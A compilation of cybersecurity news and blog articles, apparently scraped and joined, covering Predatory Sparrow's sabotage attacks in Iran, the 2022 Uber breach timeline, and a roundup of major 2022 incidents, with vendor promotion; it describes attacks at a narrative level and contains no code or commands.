In early July of 2021, computers showing schedules across Iran's national railway system began to display messages in Farsi declaring the message “long delay because of cyberattack,” or simply “canceled,” along with the phone number of the office of Iran's Supreme Leader Ali Khamenei, as if to suggest that Iranians call the number for updates or to complain. SentinelOne's Guerrero-Saade analyzed the malware used in the attack, which he dubbed Meteor Express, and found that the hackers had deployed a three-stage wiping program that destroyed computers' file systems, locked out users, and then wiped the master boot record that machines use to locate their operating system when they start up. Iran's Fars radio station reported that the result of the cyberattack was “unprecedented chaos,” but it later deleted that statement.

Around the same time, computers across the network of Iran's Ministry of Roads and Urban Development were hit with the wiper tool, too. Analysis of the wiper malware by Israeli security firm CheckPoint revealed that the hackers had likely used different versions of the same tools years earlier while breaking into Iran-linked targets in Syria , in those cases under the guise of a hacker group named for the Hindu god of storms, Indra.

“Our goal of this cyber attack while maintaining the safety of our countrymen is to express our disgust with the abuse and cruelty that the government ministries and organizations allow to the nation,” Predatory Sparrow wrote in a post in Farsi on its Telegram channel , suggesting that it was posing as an Iranian hacktivist group as it claimed credit for the attacks.

Just a few months later, on October 26, 2021, Predatory Sparrow struck again. This time, it targeted point-of-sale systems at more than 4,000 gas stations across Iran—the majority of all fuel pumps in the country—taking down the system used to accept payment by gasoline subsidy cards distributed to Iranian citizens. Hamid Kashfi, an Iranian emigré and founder of the cybersecurity firm DarkCell, analyzed the attack but only published his detailed findings last month. He notes that the attack's timing came exactly two years after the Iranian government attempted to reduce fuel subsidies, triggering riots across the country. Echoing the railway attack, the hackers displayed a message on fuel pump screens with the Supreme Leader's phone number, as if to blame Iran's government for this gas disruption, too. “If you look at it from a holistic view, it looks like an attempt to trigger riots again in the country,” Kashfi says, “to increase the gap between the government and the people and cause more tension.”

The attack immediately led to long lines at gas stations across Iran that lasted days. But Kashfi argues that the gas station attack, despite its enormous effects, represents one where Predatory Sparrow demonstrated actual restraint. He inferred, based on detailed data uploaded by Iranian incident responders to the malware repository VirusTotal, that the hackers had enough access to the gas stations' payment infrastructure to have destroyed the entire system, forcing manual reinstallation of software at gas stations or even reissuing of subsidy cards. Instead, they merely wiped the point-of-sale systems in a way that would allow relatively quick recovery.

Predatory Sparrow even went so far as to claim on its Telegram account that it had emailed the vendor for the point-of-sale systems, Ingenico, to warn the company about an unpatched vulnerability in its software that could have been used to cause more permanent disruption to the payment system. (Curiously, an Ingenico spokesperson tells WIRED its security team never received any such email.)

Predatory Sparrow also wrote on Telegram that it had sent text messages to Iran's civilian emergency services, posting screenshots of its warnings to those emergency services to fuel up their vehicles prior to the attack. “You don't see that often, right?” Kashfi says. “They chose to do very clean, controlled damage.”

In June of 2022, Predatory Sparrow carried out one of the most brazen acts of cybersabotage in history, triggering the spillage of molten steel at Iran's Khouzestan steel mill that caused a fire in the facility.

To prove that it had carried out the attack and had not merely claimed credit for an unrelated industrial accident, the hackers posted a screenshot to Telegram of the so-called human-machine interface, or HMI software, that the steelworks used to control its equipment. Paul Smith, the SCADAfence CTO who investigated the incident , quickly found a page on the website of the Iranian IT firm Irisa that listed the Khouzestan steel mill as one of its projects, matching the Irisa logo on the HMI screenshot.

Smith says he also found that both the HMI software and the surveillance camera that Predatory Sparrow used to record a video of its attack were connected to the internet and discoverable on Shodan, a search engine that catalogs vulnerable internet-of-things devices. Smith, who has a background working in steel mills, theorizes that the attack's damage was caused when the hackers used their access to the HMI to bypass a “degassing” step in the steel refining process that removes gases trapped in molten steel, which can otherwise cause explosions. He speculates that it was exactly that sort of explosion of gases trapped in the molten steel that caused the ladle to move and pour its contents on the factory floor.

A still from Predatory Sparrow’s video shows the Khouzestan steel mill prior to the hackers’ cyberattack…

..then after the attack begins, as embers, fire and smoke fill the factory…

…caused by a spill of burning liquid steel onto the factory floor, visible here.

Predatory Sparrow touted in its video, which it posted to Telegram, that it had carried out the attack “carefully so to protect innocent individuals,” suggesting that it had monitored the surveillance footage to make sure no humans were in danger. Smith doesn't buy that claim. Even beyond the two Iranian steelworkers forced to run through flying embers, feet away from burning liquid metal, he argues that the viewer can't see who else might have been in harm's way. “You don't know if anyone was hurt,” Smith says.

The Khouzestan steel mill was just one of three steel facilities that Predatory Sparrow breached in its intrusions, though those operations weren't solely targeted at physical sabotage. A week later, the group also began to post tens of thousands of stolen emails from the three steel facilities—all of which faced Western sanctions—designed to demonstrate their ties to the Iranian military.

With tensions rising across the Middle East following Hamas' October 7 attacks in southern Israel and Israel's overwhelming military response in the Gaza Strip, perhaps it was inevitable that Predatory Sparrow would play a role in that burgeoning conflict. As Iran-backed Houthi rebels began to blockade shipping in the Red Sea—and as an Iran-linked hacker group calling itself CyberAveng3rs hacked water utilities across the US with anti-Israel messages—the group staged a December 18 rerun of its 2021 gas station attack, crippling point-of-sale systems at pumps at the majority of the country's filling stations.

While technical details of this latest attack are still scant, DarkCell's Hamid Kashfi says it appears to follow the same playbook as the 2021 hacking incident, albeit likely exploiting different security vulnerabilities in the equipment. Again, Predatory Sparrow posted messages it claimed to have sent to Iranian emergency services ahead of the disruption, in an attempt to limit harm. “As in our previous operations, this cyberattack was conducted in a controlled manner while taking measures to limit potential damage to emergency services,” reads a message from the group on Telegram.

Yet again, Predatory Sparrow also made clear its hacking was intended to carry a message. “This cyberattack comes in response to the aggression of the Islamic Republic and its proxies in the region,” another of the group’s messages reads. “Khamenei, playing with fire has a price.”

SentinelOne’s Guerrero-Saade argues that actions like the gas station cyberattacks suggest that Predatory Sparrow may be the first effective example of what cyber policy wonks refer to as “signaling”—using cyberattack capabilities to send messages designed to deter an adversary's behavior. That's because, he says, the group has combined a relatively restrained and discriminating approach to its politically motivated hacking with a clear demonstration of willingness to use its capabilities for broad effects—a willingness, he points out, that the United States’ hacking agencies, like the National Security Agency and Cyber Command, have often lacked.

“There’s no such thing as effective signaling if you can’t show credibly to the other person that not only do you have the capability, but that you’re willing to use it,” Guerrero-Saade says.

Some cybersecurity researchers point to Predatory Sparrow, too, as a model of more responsible cyberwarfare, with a more careful regard for civilians. In the wake of the Israeli military’s killing of tens of thousands of Palestinian civilians and the displacement of millions more in its response to Hamas' October 7 massacre, however, any suggestion of restraint or discrimination from a hacker group that likely has Israeli government ties warrants skepticism.

Guerrero-Saade himself admits that the steel mill attack video, and in particular the two Iranian staffers’ apparent close call with death captured in it, raises questions of the cost of Predatory Sparrow’s “careful” style of attack.

“Is it perfect? Is it without casualties or concerns? Not at all,” Guerrero-Saade says. “I’m not saying I support it. But I am fascinated by it.”

The Devastating Business Impacts of a Cyber Breach

Keman Huang,
Xiaoqing Wang,
William Wei,
Stuart Madnick

No company can afford to underestimate the long-term financial costs.

Cybersecurity risks are becoming more systematic and more severe. Although the short-term impacts of a cyberattack on a business are quite severe, the long-term impacts can be even more important, such as the loss of competitive advantage, reduction in credit rating, and increase in cyber insurance premiums. They should not be ignored. To address these concerns effectively, companies need to: 1) Have a cybersecurity champion on the board to help set the tone for the organization, and 2) develop a long-term cybersecurity strategy, which should be a priority for every organization.

Cyber risks are skyrocketing. The latest IBM Data Breach Report revealed that an alarming 83% of organizations experienced more than one data breach during 2022. According to the 2022 Verizon Data Breach Investigations Report , the total number of ransomware attacks surged by 13%, which is a rise equal to the last five years combined. The severity of the situation continues to be evident with the public disclosure of at least 310 cyber incidents that occurred in the past three months alone, according to January , February , and March data from IT Governance. These include OpenAI’s ChatGPT, which exposed the payment-related and other sensitive information of 1.2% of its ChatGPT Plus subscribers due to a bug in an open-source library it used. Moreover, Samsung semiconductor has recorded three incidents where employees accidentally leaked company information when using ChatGPT.

KH Keman Huang is an Associate Professor at the Renmin University of China and a Research Affiliate at the MIT Sloan School of Management, where he works on cybersecurity management and strategy, innovation ecosystems, and big data analysis.
XW Xiaoqing Wang is a Ph.D student majoring in information security at the School of Information, Renmin University of China. Her research interests include cybersecurity behaviors, innovations, and strategies.
WW William Wei is the leader of the Multi-Cloud Working Group of Cloud Security Alliance (CSA) Greater China, and has over 20 years of cyber security experience. He was the General Manager of Trusteer Greater China, Senior Security Specialist of IBM Greater China, Head and Technical Director of Entrust Asia Pacific, and has Silicon Valley startup experience. His research interests include Edge computing, Zero trust, Secure access service edge (SASE), Extended detection and response (XDR) and cyber security culture, etc.
Stuart Madnick is the John Norris Maguire (1960) Professor of Information Technologies in the MIT Sloan School of Management, Professor of Engineering Systems in the MIT School of Engineering, and Director of Cybersecurity at MIT Sloan (CAMS): the Interdisciplinary Consortium for Improving Critical Infrastructure Cybersecurity. He has been active in the cybersecurity field since co-authoring the book Computer Security in 1979.

Partner Center

Training Overview
Cyber Crisis Tabletop Exercises (CCTE )
Incident Response Playbooks
Certified Information Systems Auditor (CISA)
GDPR Knowledge Base
Information Security Awareness Training
Previous Events
Wisdom of Crowds
CMA Educational Webinars
Keynote Speakers
Virtual Cyber Assistant (VCA)
Virtual Cyber Consultant (VCC)
Virtual CISO (Information Security Manager)
Trusted Advisors
Ransomware Tabletop Exercise
ISO 27001:2022
Ransomware Readiness Assessment
Breach Readiness Assessment
SIEM & Use-Case Assessment
Cyber Incident Response Maturity Assessment
1 Day NIST Cyber Health Check
Security GAP Assesments
ISO 27001 Audit and Implementation
Third Party Assessments and Audits
Governance, Risk and Compliance
Sans Top 20 Controls
Cybersecurity Blog
Case Studies
Client Testimonials
Our Clients
Meet the team

Uber Cyber-Attack: A Live Timeline

Date: 18 September 2022

Uber needs no introduction so we’ll skip that part and jump right into the big news - apparently it’s been compromised by an 18-year old hacker!

As per media stories and numerous Tweets, it appears that a threat actor managed to get access to Uber’s vulnerability reports, the company’s internal systems, email dashboard, and Slack server. That’s not all, screenshots doing the rounds online also indicate that the hacker allegedly had access to critical Uber IT systems, security software and Windows domain, Amazon Web Services console, VMware ESXi virtual machines.

The New York Times that first broke the news shared that it was in touch with the hacker who, apparently, claims that he managed to compromise Uber’s systems by performing a social engineering attack on an employee.

As per other reports, the hacker also had access to the company's HackerOne bug bounty program, where they commented on all of the company's bug bounty tickets. If, as some stories allege, the attacker downloaded all vulnerability reports before losing access to Uber's bug bounty program, including vulnerability reports that have not been fixed, it’s a huge security risk to Uber even in the days to come.

The idea is never to point a finger at any victim of a cyber-attack but simply to learn from their experience. The learning here is crystal clear - if employees of a Fortune 500 company can fall prey to a social engineering attack that can have such massive repercussions, anyone who assumes that their non-IT staff won’t make such a mistake is in risky territory. The only lesson here is that no organisation should ever assume they are 100% safe. Investing in cyber security and awareness training for staff should be a never-ending process and a life-long commitment. Services like our Virtual Cyber Assistant can even help organisations with very modest budgets improve their cybersecurity maturity and cyber resilience over time.

Quick reading guide:

About this Article

What & How It Happened?

Business Impact

Hbspt.cta._relativeurls=true;hbspt.cta.load(1602894, '3e36ff54-1c79-42ba-b997-4c948e403f6f', {"usenewloader":"true","region":"na1"});.

We, at Cyber Management Alliance, created this Google Doc on 16th September, 2022 and invite you to take part in sharing the intelligence and knowledge about this cyber-attack.

We are determined to use the power of the crowds, the Wisdom of Crowds, to ensure that we all have a fighting chance to protect not only cyberspace, but the physical world that is now almost, if not fully, connected to cyberspace.

This is a work in progress document and NOT final in any sense. Please feel free to contribute and/or make suggestions at [email protected] .

Disclaimer: This document has been created with the sole purpose of encouraging discourse on the subject of cybersecurity and good security practices. Our intention is not to defame any company, person or legal entity. Every piece of information mentioned herein is based on reports and data freely available online. Cyber Management Alliance neither takes credit nor any responsibility for the accuracy of any source or information shared herein.

What & How it Happened

1st January-2022: Uber ignored vulnerability disclosed by a bug bounty hunter SAFE (@0x21SAFEs). The threat hunter warned the company that the found vulnerability can be abused by threat actors to email 57 million Uber users and drivers whose information was leaked in the 2016 data breach. But Uber, allegedly, didn’t take it seriously. 17th August-2022: HackerOne shut down one of Uber's assets on HackerOne platform called ListStorageBuckets (a bug bounty program) as it was apparently compromised by the hackers.

15th September-2022: An 18-year old hacker hit Uber and accessed its third-party services as Uber disclosed this incident in its tweet: “We are currently responding to a cybersecurity incident. We are in touch with law enforcement and will post additional updates here as they become available.”

16th September-2022: Taking responsibility for the cyber attack, the hacker told The New York Times that he had been working on his cybersecurity skills for several years. He said he had broken into Uber’s systems because the company had weak security. In the Slack message that announced the breach, the threat actor raised the concern of Uber drivers. He said: “Uber drivers should receive higher pay.”

16th September-2022: According to various sources like The NY Times and Reuters, the 18-year old hacker said that he had sent a text message to an Uber employee claiming to be a corporate IT person. The worker was persuaded to hand over a password that allowed the hacker to gain access to Uber's systems.

16th September-2022: The hackers, apparently, told the NYT that they breached Uber for fun and are considering leaking the company’s source code. They also shared that they have gained access to Uber’s systems through login credentials obtained from an employee via social engineering, which allowed them to access an internal company VPN. From there, they found PowerShell scripts on Uber’s intranet containing access management credentials that allowed them to allegedly breach Uber’s AWS and G Suite accounts.

16th September-2022: According to The Register , the screenshots leaked on Twitter show: “An intruder has compromised Uber's AWS cloud account and its resources at the administrative level; gained admin control over the corporate Slack workspace as well as its Google G Suite account that has over 1PB of storage in use; has control over Uber's VMware vSphere deployment and virtual machines; access to internal finance data, such as corporate expenses; and more.” The source claims: “If this is correct, Uber has been significantly compromised with data and infrastructure at multiple levels available to the intruder.”

16th September-2022: The Register said there are many claims that show that hackers allegedly have access to a Confluence installation, private source code repositories, and a SentinelOne security dashboard used by the app developer.

16th September-2022: Tagging the tweet of Colton (@ColtonSeal) in which he shared a screenshot of the hacker claiming that he hacked Uber ( I announce I am a hacker and Uber has suffered a data breach. Slack has been stolen, confidential data with Confluence, stash and 2 monorepos from phabricator have also been stolen, along with secrets from sneakers. #uberunderpaisdrives ), the infosec analyst payloadartist (@payloadartist) said: “Apparently, the attacker even posted a message on Slack informing the Uber employees of the breach but everyone thought it was a joke.”

16th September-2022: Payloadartist (@payloadartist) posted the impact details. He tweeted: “Uber apparently got grandly hacked. Attacker basically got access to almost everything (allegedly)

- Google Workspace Admin
- AWS Accounts
- HackerOne Admin
- SentinelOne EDR
- Financial Dashboards”

16th September-2022: Sam Curry, the cybersecurity expert and threat hunter told NYT: “It seems like maybe they’re this kid who got into Uber and doesn’t know what to do with it, and is having the time of his life.”

16th September-2022: Sam Curry(@samwcyo) also highlighted this incident and the impact in his tweet: “Someone hacked an Uber employee's HackerOne account and is commenting on all of the tickets. They likely have access to all of the Uber HackerOne reports.”

16th September-2022: Sam Curry (@samwcyo) posted a tweet in which the Uber employee shared some details and urged to keep his identity hidden: “Feel free to share but please don’t credit me: at Uber, we got an “URGENT” email from IT security saying to stop using Slack. Now anytime I request a website, I am taken to a REDACTED page with a pornographic image and the message “F*** you wankers.”

16th September-2022: Sam Curry (@samwcyo) tweeted another employee’s statement: “From another Uber employee:

Instead of doing anything, a good portion of the staff was interacting and mocking the hacker thinking someone was playing a joke. After being told to stop going on slack, people kept going on for the jokes. Lmao.”

16th September-2022: While Uber employees were, apparently, taking the hacker's communication as a joke, one unnamed Uber employee, allegedly, told Sam Curry that staff were interacting with the hacker thinking they were playing a joke. He shared a communication screenshot saying: “Sorry to be a stick in the mud, but I think IT would appreciate less memes while they handle the breach.”

16th September-2022: The malware librarians at VX Underground tweeted:

“More Uber information data disclosed: vSphere, Google workplace data, and more AWS data.”

“A Threat Actor claims to have completely compromised Uber - they have posted screenshots of their AWS instance, HackerOne administration panel, and more. They are openly taunting and mocking @Uber.”

16th September-2022: Sam Curry (@samwcyo) tweeted: “The attacker is claiming to have completely compromised Uber, showing screenshots where they’re full admin on AWS and GCP.”

16th September-2022: The malware librarians at VX Underground tweeted that hackers accessed Uber’s financial data: “ They disclosed Uber's financial data”.

16th September-2022: Sharing a hint on the tactics used in the Uber data breach incident, the cybersecurity expert Corben Leo (@hacker_) tweeted: “Uber was hacked. The hacker social engineered an employee -> logged into the VPN and scanned their intranet.”

16th September-2022: Corben Leo also shared the information of an internal network TeaPot. He tweeted: “The infosec researcher Apparently there was an internal network share that contained powershell scripts.” "One of the powershell scripts contained the username and password for an admin user in Thycotic (PAM) Using this i was able to extract secrets for all services, DA, DUO, Onelogin, AWS, GSuite."

16th September-2022: Security researcher Bill Demirkapi (@BillDemirkapi) explained how hackers compromised Uber’s MFA as he tweeted this thread:

“ Let's talk about how they were compromised. The attacker has been quite upfront about how they compromised Uber's corporate infrastructure. Uber appears to use push notification MFA (Duo) for their employees. How can an attacker get around MFA?”

“An extremely common misconception people have with standard forms of MFA (push/touch/mobile) is that it prevents social engineering. Although MFA can protect against an attacker who only has the victim's credentials, it is commonly still vulnerable to MiTM attacks.”

“An attacker can setup a fake domain that relays Uber's real login page with tooling such as Evilginx. The only difference is the domain they are visiting, which is easy to miss. For most MFA, nothing stops the attacker from relaying the authentication process.”

“Once the attacker compromised an employee, they appear to have used that victim's existing VPN access to pivot to the internal network. Internal infrastructure is often significantly less audited and evaluated compared to external infrastructure.”

“In this case, the attacker appears to have found an internal network share that contained scripts with privileged credentials, giving them the keys to the kingdom. They claim to have compromised Uber's Duo, OneLogin, AWS, and GSuite environments.”

16th September-2022: After Uber took its internal software tools offline due to the cyber attack, it gradually started bringing them online. In a statement, the company stated: “Internal software tools that we took down as a precaution yesterday are coming back online this morning.”

18th September-2022: Michael (@LegacyKillaHD) a famous video gaming expert gave a clue on who could be behind the Uber hack as he tweeted: “Just an FYI. Person behind this GTA 6 leak is allegedly behind the recent hack of Uber a few days ago. At least he claims to be & used a similar method to steal Rockstar's secrets. Essentially, this isn't an angry employee or fan. A hacker that will be difficult to track down.”

16th September-2022: In its official update, Uber said: “We have no evidence that the incident involved access to sensitive user data (like trip history). All of our services including Uber, Uber Eats, Uber Freight, and the Uber Driver app are operational.”

16th September-2022: According to Bloomberg, Uber shares fell 5.2% in pre-market trading in New York Friday.

16th September-2022: According to BleepingComputer , “The attacker downloaded all vulnerability reports before they lost access to Uber's bug bounty program. This likely includes vulnerability reports that have not been fixed, presenting a severe security risk to Uber. HackerOne has since disabled the Uber bug bounty program, cutting off access to the disclosed vulnerabilities. However, it would not be surprising if the threat actor had already downloaded the vulnerability reports and would likely sell them to other threat actors to cash out on the attack quickly.”

References:

https://www.linkedin.com/posts/chiefinfosec_leadership-informationsecurity-incidentresponse-activity-6976415560624439296-OWgb?
https://twitter.com/Uber_Comms/status/1570584747071639552
https://www.theverge.com/2022/9/16/23356213/uber-hack-teen-slack-google-cloud-credentials-powershell
https://www.nytimes.com/2022/09/15/technology/uber-hacking-breach.html
https://twitter.com/samwcyo/status/1570581007044317184
https://twitter.com/vxunderground/status/1570611979169202179
https://twitter.com/ColtonSeal/status/1570596125924794368
https://twitter.com/hacker_/status/1570582547415068672
https://twitter.com/vxunderground/status/1570597582417821703
https://www.theregister.com/2022/09/16/uber_security_incident/
https://www.washingtonpost.com/technology/2022/09/15/uber-hack/
https://hackerone.com/uber/updates?type=team
https://twitter.com/hacker_/status/1570582202697809920
https://twitter.com/payloadartist/status/1570631734861111296
https://www.reuters.com/business/autos-transportation/uber-investigating-computer-network-breach-nyt-2022-09-16/
https://twitter.com/0x21SAFE/status/1476991015395471364
https://www.bleepingcomputer.com/news/security/uber-hacked-internal-systems-breached-and-vulnerability-reports-stolen/
https://www.cnbc.com/2022/09/16/uber-investigates-cybersecurity-incident-after-reports-of-a-hack.html
https://www.bloomberg.com/news/articles/2022-09-16/uber-says-it-s-investigating-extent-of-cybersecurity-incident
https://www.uber.com/en-CA/newsroom/security-update/
https://twitter.com/LegacyKillaHD/status/1571439441482235904

Legal & Disclaimers

Every contributor has made an effort to ensure that the information in this document is accurate. Cyber Management Alliance Ltd (herein referred to as CMA) hereby disclaims any liability to any party for any loss, damage or disruption caused by this information in this document or errors or omissions, whether such errors or omissions result from negligence, accident or any other cause.

The reader must understand that this document is not intended to replace professional consultancy, advice and guidance. The reader must ensure that he/she seeks professional consultation and/or refers to other material and/or consultants in matters relating to, but not limited to, cyber attacks or data breaches. Cybersecurity, information security and data privacy are a complex set of topics and the authors and CMA advise the reader to take full responsibility and precaution to protect their personal information and not to take risks beyond the level of experience, aptitude, training and comfort level.

Like this article? Share it with others!

Get Email Updates on our Latest News

Simply enter you details in the form below to subscribe:.

Drop us a line on:
[email protected]
Or call us on:
+44 (0) 203 189 1422

Show comments

Top Accounting Software Features for Managing Cybersecurity Expenses

2 September 2024

How Cloud Management Can Transform Your IT Infrastructure

30 August 2024

Essential Cybersecurity Best Practices for Safeguarding Digital Assets

27 August 2024

Halliburton Cyber Attack: Impact & Disruption to Global Energy Sector

26 August 2024

Partner Overview

Join Us for Growth, Innovation and Cybersecurity Excellence.

Become a Channel Partner

Be a Valued Partner and Embark on a Journey of Profitability.

Partner Portal

Unified Security Platform

Top Cyber Attacks of 2022 – What Were the Biggest Events of the Year?

Taking a Look at Uber, Optus, Rockstar Games, and Other Major Cybersecurity Events.

Last updated on December 30, 2022

2022 was an all-around rollercoaster, and it was no different in the world of cybersecurity. Some of the biggest cyber attacks in recent memory occurred this year, as threat actors got slicker and their methods more sophisticated. Today, we will take a look back at some of the biggest cybersecurity incidents that happened in 2022.

Twitter Breach Causes Data of 5.4 Million Accounts to be Stolen

On November 24, 5,485,635 Twitter user records were made available for free on a hacker forum . Security experts claim that the data theft was caused by an API flaw that Twitter said it had patched in January of this year.

Fortunately, most of the database consisted of information that was already public, like Twitter IDs, names, and login names, but some records also contained private information such as phone numbers and email addresses.

Allegedly, the data leak was caused by an update Twitter did to their code in June 2021. Threat actors were vigilant and before the IT team of the social media platform noticed the bug and fixed it in January 2022, the hackers already managed to get their hands on website records. Shortly after, the data was put on sale on a hacking forum for $30.000. Twitter addressed the situation in July 2022, after learning about the up-for-sale database through a press report.

After reviewing a sample of the available data for sale, we confirmed that a bad actor had taken advantage of the issue before it was addressed. (…) While no passwords were exposed, we encourage everyone who uses Twitter to enable 2-factor authentication using authentication apps or hardware security keys to protect your account from unauthorized logins.

Twitter Statement ( Source )

Uber’s Major Security Breach

Uber is one of the most used services on the planet, so of course that when the company announced that it was dealing with a cybersecurity incident a lot of people became concerned. Uber’s systems have been breached on September 15 th by “Nwave”, a hacker affiliated with the notorious threat group Lapsus$ .

The hacker was able to access internal systems used by the business, including the Slack server, the Amazon Web Services panel, the VMware ESXi virtual machines, and the Google Workspace email admin dashboard.

Lapsus$ managed to extract some internal messages and financial information and managed to access several internal tools such as G-Suite and Slack. Uber announced that despite reaching several internal systems, the threat actor was not able to extract sensitive data. To access the systems of Uber, the threat group used credentials from a third-party vendor, most likely purchased from the Dark Web .

First and foremost, we’ve not seen that the attacker accessed the production (i.e. public-facing) systems that power our apps; any user accounts; or the databases we use to store sensitive user information, like credit card numbers, user bank account info, or trip history. We also encrypt credit card information and personal health data, offering a further layer of protection.

Uber’s Statement Following the Incident ( Source )

However, this wasn’t the only cyber incident Uber suffered from. The company was the victim of another data breach on December 10 th , when the information of 77,000 employees was accessed by a threat actor.

Optus Data Breach

The second-largest telco company in Australia, Optus, was the victim of a massive data breach in September 2022. The IDs of 2.1 million current and former customers of the Australian company had been compromised following the attack, but all the 9.8 million customers of the company had other personal data exposed such as email addresses, birthdates, and phone numbers.

More than 20 Federal, State, and Territory government agencies and departments were involved in the investigation of the breach. Following the investigations, Optus confirmed that:

2 million customers have had at least one number from a current and valid ID, and personal information compromised;
Approximately 900.000 customers have had numbers relating to expired IDs compromised, in addition to personal information.

Alongside another breach, which we will talk about soon enough, the Optus data breach caused a cybersecurity revolution in Australia. The Australian authorities announced the establishment of an ongoing cooperative operation against cybercriminal organizations , consisting of 100 of the best cybersecurity experts and professionals in the country. Claire O’Neil, the Australian Minister for Home Affairs and Cyber Security “declared war” on cyber criminals, stating that the newly formed force will “scour the world, hunt down the criminal syndicates and gangs who are targeting Australia in cyber-attacks and disrupt their efforts.”.

Medibank Ransomware Attack

The other important Australian breach of the year, Medibank , a health insurance company providing services for more than 3.9 million people in Australia, was the victim of a ransomware attack. Following the incident, all clients’ personal data and health claims data were accessed by the responsible threat group.

At first, Medibank played down the seriousness of the security breach, but soon after, the ransomware group got in touch with the business to demand money and delivered a sample of 100 stolen files out of the 200GB of data they claimed to have taken in the attack.

The company confirmed in an official statement that the following data was compromised:

Name, date of birth, address, phone number, and email address for around 9.7 million current and former customers and some of their authorized representatives.
Medicare numbers (but not expiry dates) for ahm customers;
Passport numbers (but not expiry dates) and visa details for international student customers;
Health claims data for around 160,000 Medibank customers, around 300,000 ahm customers, and around 20,000 international customers. This includes the service provider name and location, where customers received certain medical services, and codes associated with diagnosis and procedures administered.
Health provider details, including names, provider numbers, and addresses.

As mentioned previously, this case contributed to the formation of a special cybersecurity force in Australia.

GTA VI Footage Leaked

The world of gaming was also not safe in 2022. Footage of one of the most anticipated games in recent memory, GTA VI , got leaked on GTAForums after a threat actor managed to access Rockstar Games’ systems through Slack.

The user “teapotuberhacker” posted more than 90 videos of an early development version of the game, showcasing animation tests, gameplay mechanics, and level layouts. The fans of the game series were also delighted to find that the game will feature its first female protagonist and that it will make a return to one of the most beloved cities in the series, Vice City.

The threat actor responsible for the leak also claims to have been involved in the Uber breach we talked about previously.

NVIDIA Data Breach

The chipmaker company acknowledged on March 1st that threat actors had gained access to sensitive data and employee login credentials after a network breach that occurred in February.

NVIDIA initially said in a statement that it was looking into an event that had some impact on its systems. Not long after, data extortion gang Lapsus$ claimed responsibility for the hack and said 1TB of Nvidia’s network data had been stolen. Over the weekend, Lapsus$ uploaded a 20GB package including data from the Nvidia servers as more information about the hack. Additionally, this archive contained the staff members’ password hashes.

Lapsus$ warned the company to perform hardware information leakage if constraints on the GeForce RTX 30 Series’ firmware lite hash rate (LHR) were not removed.

How Can Heimdal® Help You and Your Company Stay Safe in 2023

We have a lot to learn from these cases, as well as from many others occurring in the past that I have not mentioned in this post. But I think we all can certainly conclude that threat prevention should be one of our greatest concerns when it comes to cybersecurity.

To help you better secure your business in the future, Heimdal® offers you a suite of tailor-made solutions. Our Heimdal® Threat Prevention – Network for example is a revolutionary DNS filter that adds HIPS/HIDS capabilities to your corporate system, stopping cyber attackers in the tracks.

Heimdal® Network DNS Security

No need to deploy it on your endpoints;
Protects any entry point into the organization, including BYODs;
Stops even hidden threats using AI and your network traffic log;
Complete DNS, HTTP and HTTPs protection, HIPS and HIDS;

Its AI-powered neural network not only recognizes but also anticipates sophisticated threats. As a result, you won’t be caught off guard if a new malware strain attempts to infect your company. It also does not require any software to be loaded on endpoints, making it a software-free solution.

And coming to its aid it’s our Heimdal® Threat Prevention – Endpoint module so that your business will receive full defense against DNS attacks as well as well-known dangers like ransomware, data breaches, exploits, and more. Your company’s confidential information will be protected by our solution regardless of where in the globe your employees choose to work from by enabling category-based restriction of web pages.

Heimdal® DNS Security Solution

Machine learning powered scans for all incoming online traffic;
Stops data breaches before sensitive info can be exposed to the outside;
Advanced DNS, HTTP and HTTPS filtering for all your endpoints;
Protection against data leakage, APTs, ransomware and exploits;

Parting Words

So with that, the 2022 season comes to an end! These were only some of the major events which occurred in cyberspace this year. You can study other cyber attacks by checking out our blog , where you can find the latest news and other helpful articles. I would like to wish you all a happy (and safe) new year, and see you again in 2023!

If you liked this article, follow us on LinkedIn , Twitter , Facebook , Youtube , and Instagram for more cybersecurity news and topics.

Cristian Neagu

CONTENT EDITOR

Cristian is a Content Editor & Creator at Heimdal®, where he developed a deep understanding of the digital threat landscape. His style resonates with both technical and non-technical readers, proof being in his skill of communicating cybersecurity norms effectively, in an easy-to-understand manner.

CHECK OUR SUITE OF 11 CYBERSECURITY SOLUTIONS

Cyber Resources And Beginners
Cyber Security Glossary
The Daily Security Tip
Cyber Security For Small Business Owners
Cybersecurity Webinars
About Heimdal®
Press Center
Partner with us
Affiliate Program

Vat No. 35802495, Vester Farimagsgade 1, 2 Sal, 1606 København V

Penetration Testing|The Ultimate Tool for Cyber Security Assessment
Internal Network Penetration Testing| Are You Protected Against Internal Security Threats?
Incident Response|Comprehensive Expert Help After a Security Incident
Computer Forensics|Arm Your Legal Team with Digital Evidence
Expert Witness Services|Build Your Case with Kevin's Expertise
Security Awareness Training|Your Comprehensive Security Training Library
Vulnerability Assessment|See Your System Through the Eyes of a Hacker
Product Claims Testing|Get Unbiased Proof From the Best in the Business
Red Team Operations|Evaluate Your Response to An Active Data Breach
Social Engineering Strength Testing|Safeguarding Your Security From Human Manipulation
The Art of Invisibility|The World's Most Famous Hacker Teaches You How to Be Safe in the Age of Big Brother and Big Data
Ghost in the Wires|My Adventures as the World's Most Wanted Hacker: A New York Times Bestseller
The Art of Intrusion|The Real Stories Behind the Exploits of Hackers, Intruders and Deceivers
The Art of Deception|Controlling the Human Element of Security
About Kevin|Whether you call him famous or infamous, Kevin Mitnick is one of a kind.
Global Ghost Team|The Best of the Best In Cyber Security and Pentesting, Handpicked for Your Team
Our Clients|Our Legacy of Extraordinary Services for Extraordinary Clients
Testimonials & Reviews|Approved Quotes about Kevin's Live Hacking Appearances
Press Archives|The Latest Cybersecurity Articles & News About Kevin Mitnick & Mitnick Security
Media Kit|Bureau-Friendly Material For Your Website, E-mail and Print Needs
FAQs|Explore answers to commonly-asked questions from fans, clients, colleagues and everyone in between.
Blog|The latest news from Kevin Mitnick and the Global Ghost Team
Virtual Events|Unsurpassed Experience in Successful Online Events and Trainings
Lockpick Business Card|Learn More About the Card That Opens Doors Around the World
Submit a Proposal|Contact Kevin’s Team With Your Proposal or Business Opportunity
Join the Team|Do You Want to Work With Us?

Uber Data Breach: What To Know About the 2022 Cybersecurity Attack

No matter how robust network security is, even the biggest companies fall victim to cyber attacks. These malicious attacks can be costly — to the tune of 4.3 million on average — but they also disrupt operations and hurt a company’s reputation.

In fact, it is anticipated that cybercrime will cost the world $10.5 trillion annually by 2025. A recent breach at Uber reminds us of how social engineering attacks are on the rise and urges us to protect and train our employees to prevent such detrimental attacks. Below, we’ll dissect the Uber data breach and what you can do to avoid facing a similar devastating situation.

So, What Happened at Uber?

